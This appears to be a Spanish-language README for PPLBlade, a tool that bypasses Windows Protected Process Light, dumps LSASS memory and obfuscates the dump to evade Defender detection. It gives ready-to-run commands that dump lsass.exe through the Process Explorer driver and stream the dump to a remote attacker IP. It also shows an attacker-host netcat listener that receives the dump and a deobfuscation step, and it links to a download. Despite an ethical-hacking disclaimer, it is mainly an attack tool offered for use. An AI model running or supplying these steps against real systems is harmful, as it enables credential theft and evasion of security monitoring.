Herramienta de Volcado de Proceso Protegido que soporta ofuscar el volcado de memoria y transferirlo a estaciones de trabajo remotas sin dejarlo en el disco.
NOTA IMPORTANTE: Este contenido es compartido exclusivamente con la concepción de usarse como medida de seguridad y avances de hacking ético.
Funcionalidades clave:
- Bypass de la protección PPL
- Ofuscar archivos de volcado de memoria para evadir mecanismos de detección basados en firmas de Defender
- Subir volcado de memoria con métodos de carga RAW y SMB sin dejarlo en el disco (volcado sin archivos)
Para obtener una visión general de las técnicas utilizadas en esta herramienta, visite: Bypassing Defenders – LSASS Dump Detection and PPL Protection in Go
Debes tener en cuenta que PROCEXP15.SYS se menciona en los archivos fuente con fines de compilación. No es necesario transferirlo a la máquina objetivo junto con PPLBlade.exe. Ya está integrado en PPLBlade.exe. El exploit es simplemente un ejecutable único.
Modos:
- Dump: Volcar memoria del proceso usando PID o Nombre del Proceso
- Decrypt: Revertir el archivo de volcado ofuscado (–obfuscate) a su estado original
- Cleanup: Realizar la limpieza manualmente en caso de algún problema en la ejecución (tenga en cuenta que los valores de las opciones deben ser los mismos que los de la ejecución que estamos intentando limpiar)
- DoThatLsassThing: Volcar lsass.exe usando el controlador de Process Explorer (POC básico)
Modos de Manejo:
- Direct: Abre un handle PROCESS_ALL_ACCESS directamente, utilizando la función OpenProcess()
- Procexp: Utiliza PROCEXP152.sys para obtener un handle
Ejemplos:
POC básico que utiliza PROCEXP152.sys para volcar lsass:
PPLBlade.exe --mode dothatlsassthing
(Tenga en cuenta que no realiza el XOR del archivo de volcado, proporcione una bandera adicional de obfuscate para habilitar la funcionalidad XOR)
Subir el volcado LSASS ofuscado a una ubicación remota:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Host atacante:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Desofuscar el volcado de memoria:
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Descargar PPLBlade